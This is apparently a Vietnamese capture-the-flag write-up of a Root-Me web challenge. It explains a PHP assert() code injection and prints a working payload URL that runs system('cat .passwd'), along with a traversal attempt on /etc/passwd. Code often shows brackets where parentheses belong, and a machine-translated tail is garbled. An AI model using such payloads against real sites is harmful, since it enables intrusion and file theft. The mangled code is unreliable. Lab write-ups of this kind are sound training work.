Skip to content
Hé lô, come back với bài khởi động buổi sáng. Assert[] , Đây là hàm kiểm tra logic. Vô bài nào, interface khá quen thuộc 🙂Assert[] , Đây là hàm kiểm tra logic. Vô bài nào, interface khá quen thuộc 🙂
Nhìn các param trên URL kích thích như mọi lần, như thói quen, inject code LFI, RFI các kiểu !!!
Hú hu , Assert và Strpos . Nhưng có một điều khá thú zị là bạn có thể control input theo ý muốn và repair code. Đoạn code prevent cho lỗi trên có thể là:
assert["strpos['$file', '..'] === false"] or die["Detected hacking attempt!"];Có thể control trực tiếp vào code thì còn khó khăn gì nữa, quan trọng là bạn muốn nó như nào thôi. Theo đề thì cần read file .passwd, thì ắc hẵn mình cứ system[‘cat .passwd’] là hết xảy con bà 7.
Đoạn code malicious như sau:
//challenge01.root-me.org/web-serveur/ch47/?page=’,”] or system[‘cat .passwd’] ; //
Để mình giải thích thêm nhé !!!
BEFORE:assert[“strpos[‘$file’, ‘..’] === false”] or die[“Detected hacking attempt!”]; AFTER: assert[“strpos[‘$file‘,”] or system[‘cat .passwd’] ;//‘, ‘..’] === false”] or die[“Detected hacking attempt!”];
AFTER: assert[“strpos[‘$file‘,”] or system[‘cat .passwd’] ;//‘, ‘..’] === false”] or die[“Detected hacking attempt!”];
Đoạn code mình change màu chính là đoạn malicious mình inject vào . Mình thêm // vào để comment cho đoạn sau và không cần care nó nữa . Và điều gì đến cũng đến …
FLAG : {TRY_HARD_DON’T_COPY_PASTE}
Mình viết ngẫu hứng , không giỏi viết lách nên đừng bắt bẻ mình vụ câu cú các kiểu nhé . SAM THA MI TA ❤
25 điểm Đọc tài liệu! Hãy cố gắng thực hiện một cuộc tấn công LFI bằng cách sử dụng tham số nhận trang. Hãy cố gắng mở/etc/passwd: //challenge01.root-me.org/web-servur/ch47/?page=../../../../etc/passwd được hiển thị cảnh báo: CẢNH BÁO: ASPERT []: khẳng định "strpos ['bao gồm /../../../../../../ ... vv/passwd.php', '..'] == false" Faleled In/Thử thách Web-Serveur/CH47/Index.php trên dòng 8 Đã phát hiện cố gắng hack! Ứng dụng này sử dụng chức năng Assert để xác minh xem vô hình là sai. Mã PHP của ứng dụng này trông giống như thế này:PHP Assert []